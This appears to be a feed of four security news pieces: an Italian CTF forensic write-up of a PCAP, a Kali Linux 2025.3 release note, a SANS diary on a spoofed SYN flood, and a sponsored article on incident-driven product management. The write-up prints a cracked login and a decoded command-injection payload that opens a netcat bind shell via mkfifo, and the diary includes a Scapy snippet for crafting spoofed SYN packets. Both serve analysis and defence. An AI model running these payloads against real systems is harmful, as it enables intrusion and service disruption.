Addentriamoci ulteriormente nell’enumerazione effettuata dall’attaccante e proviamo a filtrare quali richieste DNS l’attaccante ha effettuato, tramite il comando: dns && (ip.addr == 192.168.1.5) Immediatamente notiamo delle richieste DNS di tipo AXFR,. AXFR è il codice per i trasferimenti di zona DNS (DNS Zone Transfer). Un DNS Zone Transfer è un meccanismo pensato per replicare le informazioni di un server DNS primario su un secondario, trasferendo l’intero file di zona (contenente tutti i record DNS, quindi tutti i sottodomini e relativi indirizzi). Questa operazione dovrebbe essere limitata ai soli server autorizzati; se è aperta a chiunque, costituisce una grave miss-configurazione. L’attaccante ha quindi inviato una richiesta AXFR al server DNS dell’azienda e ha ottenuto indietro tutta la zona DNS contenente i sottodomini dell’organizzazione. Dall’analisi del pacchetto di risposta alla richiesta AXFR (trasferimento di zona) possiamo contare nove sottodomini (cs-corp), adesso in possesso dell’attaccante. Prevenire un attacco di DNS Zone Transfer non autorizzato Il DNS Zone Transfer (AXFR) è una funzionalità prevista dal protocollo DNS per consentire la sincronizzazione tra un server primario e i suoi secondari. Tuttavia, se mal configurato, può diventare una pericolosa fonte di informazioni per un attaccante. È esattamente ciò che è accaduto nel caso analizzato: l’aggressore ha inviato una semplice richiesta AXFR al server DNS dell’organizzazione e ha ottenuto in risposta l’intero contenuto della zona, inclusi tutti i sottodomini interni ed esterni dell’azienda. Parliamo di un vero e proprio elenco dettagliato dei servizi pubblici e (talvolta) interni, come ad esempio mail.cs-corp.cd, sysmon.cs-corp.cd, download.cs-corp.cd e altri. In totale, nove sottodomini sono stati raccolti in pochi secondi, fornendo all’attaccante una mappa completa della superficie di attacco. Per evitare situazioni di questo tipo, è fondamentale che il “trasferimento di zona” sia limitato solo ai server DNS secondari autorizzati. Nella maggior parte dei server DNS (come BIND o Microsoft DNS), esistono impostazioni esplicite per definire quali indirizzi IP possono richiedere un AXFR. Se non si interviene, il server potrebbe rispondere a chiunque, compresi scanner automatici e tool utilizzati da gruppi criminali. Oltre a configurare correttamente il servizio, è buona pratica effettuare test regolari dall’esterno (es. con dig o host) per verificare che le richieste AXFR non ricevano risposta. Anche monitorare i log DNS può aiutare a rilevare tentativi sospetti di trasferimento non autorizzato, magari eseguiti da host esterni in fase di ricognizione. Dopo che l’attaccante ha ottenuto la lista dei sottodomini, è probabile che abbia concentrato i suoi sforzi su uno di essi. Filtriamo in WireShark, come prima cosa, il traffico che prende in considerazione i due IP oggetto dell’analisi ip.addr == 192.168.1.5 && ip.addr == 192.168.1.3 Andiamo sul menu: Statistics > Requests. Difatti, una delle prime richieste è proprio una SQL Injection ai danni del dominio sysmon.cs-corp.cd pagina /index.php parametro fbep= Possiamo quindi concludere di aver individuato il nostro sottodominio vittima: sysmon.cs-corp.cd Sappiamo quindi ora, dalle evidenze raccolte, che l’attaccante ha interagito con la pagina di login (index.php) sul sottodominio sysmon.cs-corp.cd. Avendo individuato le richieste POST su index.php, possiamo esaminarle in dettaglio. In Wireshark, filtriamo il traffico HTTP verso sysmon.cs-corp.cd e osserviamo i codici di risposta: vediamo una serie di richieste POST con risposte di errore (codice 200 con messaggio di login fallito, o 302 che ridirige di nuovo al login). http.host == “sysmon.cs-corp.cd” seguite finalmente da una richiesta POST che riceve un HTTP 302 Redirect verso dashboard.php. http.request.uri == “/dashboard.php” È sufficiente seguire HTTP Stream: Tasto Destro del mouse sulla richiesta > Follow > http Stream admin:Pass@000_ Difendersi da attacchi a siti web con credenziali deboli o brute force Uno dei vettori più comuni, e spesso sottovalutati, per la compromissione di un’applicazione web è l’uso di credenziali deboli o di “default”. In molti casi reali (incluso quello analizzato nella CTF), gli attaccanti non hanno fatto altro che tentare ripetutamente combinazioni di username e password finché non hanno trovato quella giusta: ad esempio, un classico admin:Pass@000_. Questa tecnica, nota come brute-force, può essere grezza o più sofisticata (dizionario, credenziali riutilizzate, tentativi estesi), ma il principio non cambia: se le credenziali sono prevedibili, prima o poi verranno “indovinate”. Per difendersi efficacemente da questi scenari è fondamentale partire dalla scelta e gestione delle password. Le credenziali di amministrazione devono essere lunghe, complesse e uniche. Password “di default” – come admin:admin o password123 – devono essere rimosse immediatamente dopo l’installazione di qualsiasi componente web. Ma non basta contare solo sull’utente: vanno attivate difese proattive contro i tentativi di accesso automatizzati. Sistemi come il blocco temporaneo dell’IP dopo X tentativi falliti, il CAPTCHA nei form di login o strumenti come Fail2Ban possono ridurre drasticamente l’efficacia degli attacchi brute-force. Un’ulteriore misura di sicurezza è l’introduzione della multi-factor authentication (MFA): anche se l’attaccante indovina la password, non potrà accedere senza il secondo fattore (come un codice OTP o una notifica su dispositivo mobile). Torniamo al nostro PCAP e analizziamo le richieste successive al login. Abbiamo visto comparire dashboard.php. Quindi riapplichiamo il filtro di WireShark precedentemente utilizzato: http.request.uri == “/dashboard.php” Ispezionando le richieste POST verso dashboard.php, in una di esse troviamo nel corpo qualcosa di sospetto: un pezzo di codice/testo che assomiglia a un comando shell concatenato. Seguendo il flusso HTTP relativo, individuiamo che l’attaccante ha inviato un payload al server, subito dopo aver effettuato il login. Il payload in questione è quello riportato nell’immagine sottostante. host=%7Cmkfifo+%2Ftmp%2Fmypipe%3Bcat+%2Ftmp%2Fmypipe%7C%2Fbin%2Fbash%7Cnc+-l+-p+5555+%3E%2Ftmp%2Fmypipe Anche se il payload codificato rivela già la Reverse Shell, possiamo ulteriormente decodificarlo, in maniera semplice, utilizzando CyberChef tramite la funzione “URL Decode”, ottenendo: host=|mkfifo /tmp/mypipe;cat /tmp/mypipe|/bin/bash|nc -l -p 5555 >/tmp/mypipe Dove: mkfifo /tmp/mypipe; crea un FIFO (named pipe) chiamato /tmp/mypipe. Un named pipe è un file speciale usato per comunicazione tra processi. cat /tmp/mypipe | /bin/bash | nc -l -p 5555 > /tmp/mypipe. Questa parte concatena tre elementi tramite pipe: cat /tmp/mypipe rimane in ascolto leggendo dal pipe (si blocca in attesa di input). L’output di cat viene passato a /bin/bash, che lo esegue come comandi shell. L’output di Bash viene passato al comando nc (netcat) che ascolta sulla porta 5555 in modalità listener (-l -p 5555) e invia tutto ciò che riceve dalla pipe Bash al client che si connetterà. Infine, tutto ciò che arriva da netcat (cioè i comandi dell’attaccante) viene reindirizzato di nuovo nel pipe /tmp/mypipe, chiudendo il loop. Possiamo concludere che questo comando ha fornito all’attaccante l’Initial Access sulla macchina, la sua shell. Le vulnerabilità In molti scenari avanzati, come quello affrontato nella CTF, l’attaccante sfrutta una debolezza logica o tecnica presente in un’applicazione web accessibile solo dopo l’autenticazione. In questo caso, una volta ottenuto l’accesso tramite credenziali deboli o brute-force, l’attaccante ha probabilmente sfruttato una funzionalità vulnerabile che gli ha permesso di eseguire comandi arbitrari sul server (Remote Code Execution – RCE). Da lì ha stabilito una reverse shell, ottenendo così il primo punto di ingresso (“Initial Access”) nell’infrastruttura. Una difesa efficace parte innanzitutto dalla gestione delle vulnerabilità note. È essenziale adottare politiche di aggiornamento e patching regolari, soprattutto su componenti esposti sul web: framework, CMS, plugin e librerie lato server devono essere costantemente aggiornati. La mancata applicazione delle patch espone l’organizzazione a exploit pubblici già documentati (con tanto di CVE e PoC disponibili), rendendo l’attacco estremamente semplice per qualsiasi attore malevolo. A fianco del patching, è importante: Analizzare anche le aree protette da login: le attività di code review e vulnerability assessment devono includere funzionalità interne e amministrative. Segmentare la rete: un’applicazione web compromessa non dovrebbe poter comunicare direttamente con sistemi sensibili. Monitorare i log di sistema e applicativi per rilevare comandi sospetti come nc, bash, mkfifo, tipici di una reverse shell. Limitare le comunicazioni in uscita dai server web verso Internet, consentendo solo le destinazioni strettamente necessarie. Utilizzare strumenti di rilevamento per individuare comportamenti anomali a livello di processo o connessione di rete.
cybersecurity360.itSep 25, 2025extracted
Kali Linux 2025.3 brings improved virtual machine tooling, 10 new tools
Kali Linux 2025.3 brings improved virtual machine tooling, 10 new tools OffSec has released Kali Linux 2025.3, the most up-to-date version of its popular penetration testing and digital forensics platform. What’s new in Kali Linux 2025.3 Better virtual machine tooling The way Kali builds and ships its VM images has been updated, they improved their scripts and workflows to be more consistent and easier to manage.  Nexmon Wi-Fi support Nexmon is a firmware patch that allows users to enable monitor mode (packet sniffing) and packet injection on certain wireless chips. With this release, Kali brings back Nexmon support for more devices, especially Raspberry Pi models (including Pi 5).  10 new tools New versions of Kali deliver updates for available packages, but also new tools: Caido and Caido-cli – the client and the server section of caido desktop, a web security auditing toolkit Detect It Easy (DiE) – A tool for identifying file types Gemini CLI – Open-source AI agent that brings Gemini directly into the terminal krbrelayx – A Kerberos relaying and unconstrained delegation abuse toolkit ligolo-mp – An advanced version of Ligolo-ng that enables pentesters to play with multiple concurrent tunnels collaboratively llm-tools-nmap – Enables LLMs to perform network discovery and security scanning tasks with nmap mcp-kali-server – An MCP configuration to connect AI agents to Kali patchleaks – A tool for comparing two versions of a code‑base. It highlights changes and explain why they matter, thus quickly pinpointing security fixes vwifi-dkms – A tool for setting up “dummy” Wi-Fi networks, establishing connections, and disconnecting from them Additional tweaks The NetHunter (mobile penetration testing) and CARsenal (car hacking) toolkits have been updated and improved, support for ARMel architecture has been dropped, and OffSec has made Xfce’s VPN-IP panel plugin configurable to make life easier for users. Kali Linux 2025.3 is available for download here. Must read: 35 open-source security tools to power your red team, SOC, and cloud security GitHub CISO on security strategy and collaborating with the open-source community Subscribe to the Help Net Security ad-free monthly newsletter to stay informed on the essential open-source cybersecurity tools. Subscribe here!
helpnetsecurity.comSep 24, 2025extracted
&#x5b;Guest Diary&#x5d; Distracting the Analyst for Fun and Profit, (Tue, Sep 23rd)
[This is a Guest Diary by Taylor House, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].] Distributed denial of service (DDoS) attacks are a type of cyber-attack where the threat actor attempts to disrupt a service by flooding the target with a ton of requests to overload system resources and prevent legitimate traffic from reaching it. From March 31st until April 20th of this year, my honeypot went under a constant barrage of TCP SYN packets over port 443. This post seeks to go over this attack and share observations proving how looks can be deceiving. In total, this attack sent 2389339 packets from 6039 hosts. The attack came over a series of three waves, with no relation other than the destination port and the flag that was set. A sample was taken from the first of these waves, and each packet was found to have these properties: A total length of 60 bytes. Targeted port 443 using the TCP protocol. Had the SYN flag and no other flags set. Had a window size of 32768. Had a maximum segment size of 1460 bytes. A trailer in the Ethernet header containing 2 bytes of padding. Figure 1. Wireshark output displaying a sample of packets from wave 1. The First Wave The first wave occurred from March 31st until April 4th, sending 647069 packets from 743 hosts. The top 10 hosts from this wave were: Figure 2. Top 10 hosts from wave 1 by number of packets sent. An overwhelming majority of the hosts (86%) were within the IP address range 103.15.245.0-103.15.247.99. Of those hosts, 36 of them had domain name entries. All these hosts are assigned to Summit Communications, an ISP located in Bangladesh. Of those 36 hosts, Shodan intelligence [2] shows multiple possible vulnerabilities due to outdated software such as: dropband[.]summitiig[.]net is running a web server on Apache version 2.4.18 and may be vulnerable to critical vulnerabilities such as buffer overflow attacks and remote code execution attacks that enable attackers to exert direct control over the system through the web server. [3,4] mrtg[.]summitiig[.]net is running an even older version of Apache, version 2.2.15, and may be vulnerable to vulnerabilities such as buffer overflow and reading process memory. [5,6] Crafted Packets? It is possible that this could be the result of a botnet. However, with only a minority of hosts having domain names or clearly exposed services, another possible explanation is the connections were spoofed. The consistent size and attributes of the packets, including window size and maximum segment size, is a sign this might be happening because of packet crafting using a tool like Scapy. Packet crafting is a process for sending fake packets to a target with custom fields. Suppose I craft a packet to send to my loopback address using the following commands. Padding can be any value, since there are two random bytes that can be found at the end of each packet: packet = IP(src=RandIP(), dst='127.0.0.0')/TCP(sport=RandShort(), dport=443, window=32768, options=[('MSS',1460)])/Padding('\x00\x00') send(packet, iface=?lo?) #Repeat many times? What we find on the other side is the following: Figure 3. Screenshot of the crafted packets captured in Wireshark. Shockingly similar to the observed activity! This proves that packet crafting may have a role to play in this attack. The Second Wave The second wave occurred from April 7th until April 14th, sending 885209 packets from 1054 hosts. The top 10 hosts from this wave were: Figure 4. Top 10 hosts from wave 2 by number of packets sent. This wave had both more hosts and each host sent more packets, demonstrating a slight increase in the rate of packets sent. The majority of hosts (60%) were from the IP range 85.194.196.1-85.194.198.99. All these hosts are assigned to ScopeSky, an ISP located in Iraq. CloudFlare reports a spike in Layer 7 attacks sourcing from ScopeSky’s autonomous systems number for the period of this attack, suggesting that many attacks involving the application layer, like web application firewall bypasses and DdoS attacks are coming from this autonomous systems number over the period relative to previous periods [7]. Figure 5. Application layer attack volume change relative to the previous period from AS50597: ScopeSky [7]. Is this a new botnet? The chance these are the legitimate sources is low. Given that it makes up a third of the address space assigned to ScopeSky, this would be a major incident for the company and would make the news. This proves that threat actors can spoof their traffic to make it look like it is coming from another source, but an 1800% increase is very unrealistic for it to appear like a legitimate threat. The Third Wave The third wave occurred from April 16th until April 20th, sending 857061 packets from 4242 hosts. The top 10 hosts from this wave were: Figure 6. Top 10 hosts from wave 3 by number of packets sent. An overwhelming majority of hosts (96%) came from the ip range 176.241.80.0-176.241.95.99. These ranges are covered by two autonomous systems numbers: AS57588, managed by Hayat for Internet & communication LLC, another ISP in Iraq, and AS57000 LinkiWay DMCC, an Emirati ISP [8,9]. This wave had a lot more hosts, but the number of packets per host were a lot fewer, which may increase the rate of packets being sent, but impacts the overall volume. GreyNoise reports 44 known malicious hosts from this wave [10]. The hosts have been observed doing a variety of suspicious actions such as Telnet/SSH brute forcing attempts, web crawling, default password guessing, and the deployment of various worms such as variants of WannaCry and TrickBot. Looking at Shodan data relevant to the identified ASNs [11,12], There are about 150 systems that have SSH exposed externally, a very poor security practice. The known malicious systems may have been brute forced by the threat actor to gain more systems under their control. Combined with spoofing, this may explain why the total host count is so high relative to the other waves. Is this really a DDoS? While the honeypot received a total of 2389339 packets, this is likely not enough to interrupt a modern service. For DDoS attacks, they are usually represented by the number of packets (or requests when speaking in terms of HTTP) per second. CloudFlare reported that they mitigated a DDoS attack operating at over 71 million requests per second [13]. In this attack, the packet volume was not nearly that high, and the sample we collected from the first wave only achieved 12.1 packets per second. Figure 7. Average packets per second from the packet capture. Even if the rate picked up significantly in the third wave since the number of hosts were higher, it would not ever reach a high enough speed to have a good chance at taking down a service. So, what was the point of this attack if it was not to shut down services? While SYN flags can be used to scan a network for open ports (listening ports would respond with a SYN-ACK), this was a spike relative to my usual traffic, it is unlikely that so many hosts decided to scan the honeypot at the same time. Figure 8. Number of packets received by the honeypot from April 14th to July 14th. There are also tools like nmap that can perform SYN scans with the -sS option, but the packets do not have the same properties as our sample data: Figure 9. Wireshark capture of a nmap SYN scan. Note the window size and length. In summary, if this was a DDoS, it is very unlikely to be effective on any modern system. A scan using TCP SYN flags is also very unlikely, leaving few explanations for this attack. Lessons Learned We can draw a few conclusions from analyzing each wave of this attack. First, packet crafting may have been in use to mask the attacker’s real IP address, Secondly, a legitimate SYN flood attack seems very unlikely here, since the packet volume and rate were both far too low. Finally, traffic came from unlikely sources without making the news or showing up on threat intelligence aside from a very small minority of traffic, strongly indicating that the traffic is not legitimate. Another possibility is that all of this traffic was a smokescreen for another attack. An analyst can waste a lot of time looking at network logs that seem related while the real attack may be taking place using another method that seems unrelated. The demonstration of Scapy shows that it is quite easy to spoof network traffic and send it to a target host to create very noisy network logs. You could even create a list of IP addresses like the hosts found in the waves to create the light correlations described in my findings. In short, this makes an excellent distraction. As for what the plan for attack was, the honeypot did not log any attacks of significance, other than what is typical of the daily traffic. On April 1st, there were some hosts that were also logged in the first wave attempting to access the following URLs from the web honeypot: / /.git/config /.git/index /.env To wrap up, the packet volume was not enough for this attack to be considered an effective DDoS attack, it also does not seem to be an access attack on web services, but the small SYN flood made an excellent distraction if the threat actor wished to perform a more complex attack. Understanding what volume a SYN flood becomes a threat is important to avoid getting caught in a distraction as an analyst. --- Taylor House Apprentice Handler, Internet Storm Center
isc.sans.eduSep 23, 2025extracted
The role of the cybersecurity PM in incident-driven development
Article written by cybersecurity expert Yuriy Tsibere. Gone are the days when cybersecurity meant stopping annoying viruses like the Love Bug. Today, it’s about battling a massive, financially motivated cybercrime industry. Attacks are smarter, faster, and more damaging—and that changes everything for product teams. For product managers (PMs), this means understanding that attackers are constantly exploiting the same weak spots: stolen admin credentials, missing multi-factor authentication (MFA) on VPNs, remote encryption, and clever “living off the land” (LOTL) tricks like using Office to launch PowerShell. Even something as simple as an unpatched firewall or a rogue USB drive can open the door to a breach. New vulnerabilities and zero-days are popping up all the time, and product teams have to stay on their toes. A few examples: WannaCry (2017): Used the EternalBlue flaw in SMBv1 to spread ransomware fast. It forced companies to disable SMBv1 altogether. Some Exchange Server bugs: Let attackers run malicious scripts, sometimes leading to ransomware. Log4j vulnerability: A vulnerability in a popular Java logging framework that enables arbitrary code execution. Still showing up in outdated firewalls and VPNs. Follina (MSDT): Let Office apps launch PowerShell without any user interaction. Timely patching helps, but it’s not enough. There’s always a gap between discovering a flaw and fixing it. That’s why teams need layered defenses and a mindset that’s ready to respond to incidents as they happen. How breach reports drive real-time product shifts The 100 days to secure your environment webinar series from ThreatLocker is a great example of incident-driven development. It helps security leaders focus on what matters most in their first few months. Real-world breaches often directly lead to new product features or policy changes. Here’s how: Unlocked machines: a threat actor once accessed a hospital computer that was left open and ran PowerShell. Now, password-protected screen savers are a must. USB data theft: USB drives are still a go-to for stealing data. Products now offer fine-grained USB controls—blocking unencrypted drives, limiting file types, or capping how many files can be copied. Lateral movement: Ransomware often spreads using old admin accounts. Tools now detect and remove these after review. LOTL attacks: Follina showed how legit tools can be misused. Ringfencing™ helps stop apps from launching things they shouldn’t. Outbound traffic abuse: Attacks like SolarWinds used outbound connections. Now, default-deny policies for server traffic are becoming standard. Stolen credentials: MFA is non-negotiable for cloud accounts, remote access, and domain controllers. Vulnerable VPNs: Unpatched VPNs are a big risk. Features now include IP-based access controls or even disabling unused VPNs. The PM's response: From advisory to actionable feature For cybersecurity PMs, reacting to threats means more than just writing advisories. It’s about building smarter, safer products. Here’s how: Get full visibility Start by understanding what’s running in your environment. Use monitoring agents to track file activity, privilege changes, app launches, and network traffic. Prioritize risks With a complete picture, PMs can focus on high-risk tools and behaviors: - Remote access tools like TeamViewer or AnyDesk - Software with too many permissions (e.g., 7-Zip, Nmap) - Risky browser extensions - Software from high-risk regions Drive adaptive policy creation Security policies should evolve with the threat landscape: - Test first: Use monitor-only mode and test groups before enforcing new rules. - Be precise: Go beyond on/off switches—use dynamic ACLs, Ringfencing, and app-specific admin rights. - Encourage adoption by minimizing disruption - Offer a store of pre-approved apps - Make it easy to request new software - Explain why restrictions exist—it builds trust - Continuous improvement and monitoring: - Use health reports to spot misconfigurations - Block USB file copies if thresholds are exceeded - Clean up old policies and unused apps regularly Embrace patch management Make sure everything—from operating systems to portable applications like PuTTY—is up to date. Use tools to find missing patches and test them with pilot users before rolling out. Protect backups Backups must be shielded from compromise. This includes limiting which apps can access them and requiring MFA for backup services. PMs should also test the backups regularly to validate recovery readiness. Cybersecurity PMs are on the front lines of using real-world protections against real-world threats. By staying informed, collecting the right data, and building with users in mind, you can reduce risk without making life harder for your team. Sponsored and written by ThreatLocker.
bleepingcomputer.comJul 25, 2025extracted